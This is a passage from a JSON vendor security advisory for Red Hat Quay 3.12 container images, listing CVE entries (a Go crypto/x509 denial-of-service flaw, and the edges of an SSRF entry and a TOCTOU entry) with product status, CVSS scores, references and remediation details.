            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "mirror-registry: quay: quay: Server-Side Request Forgery via log export functionality"
    },
    {
      "cve": "CVE-2026-32281",
      "cwe": {
        "id": "CWE-1050",
        "name": "Excessive Platform Resource Consumption within a Loop"
      },
      "discovery_date": "2026-04-08T02:01:00.930989+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456333"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Go\u0027s `crypto/x509` package. A remote attacker could exploit this by presenting a specially crafted certificate chain containing a large number of policy mappings. This inefficient validation process consumes excessive resources, which can lead to a denial of service (DoS) for applications or systems performing certificate validation.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "crypto/x509: golang: Go crypto/x509: Denial of Service via inefficient certificate chain validation",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This flaw occurs during the validation of otherwise trusted certificate chains that contain a large number of policy mappings, leading to excessive resource consumption. Exploitation requires an attacker to present a specially crafted, yet trusted, certificate chain which would require the attacker has already compromised a trusted certificate root. Red Hat continuously monitors certificate authorities and curates the set which is trusted by default for Red Hat products.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32281"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456333",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456333"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32281",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32281"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32281",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32281"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/758061",
          "url": "https://go.dev/cl/758061"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/78281",
          "url": "https://go.dev/issue/78281"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
          "url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4946",
          "url": "https://pkg.go.dev/vuln/GO-2026-4946"
        }
      ],
      "release_date": "2026-04-08T01:06:58.354000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "crypto/x509: golang: Go crypto/x509: Denial of Service via inefficient certificate chain validation"
    },
    {
      "cve": "CVE-2026-32282",
      "cwe": {
        "id": "CWE-367",
        "name": "Time-of-check Time-of-use (TOCTOU) Race Condition"
      },
      "discovery_date": "2026-04-08T02:01:12.683211+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
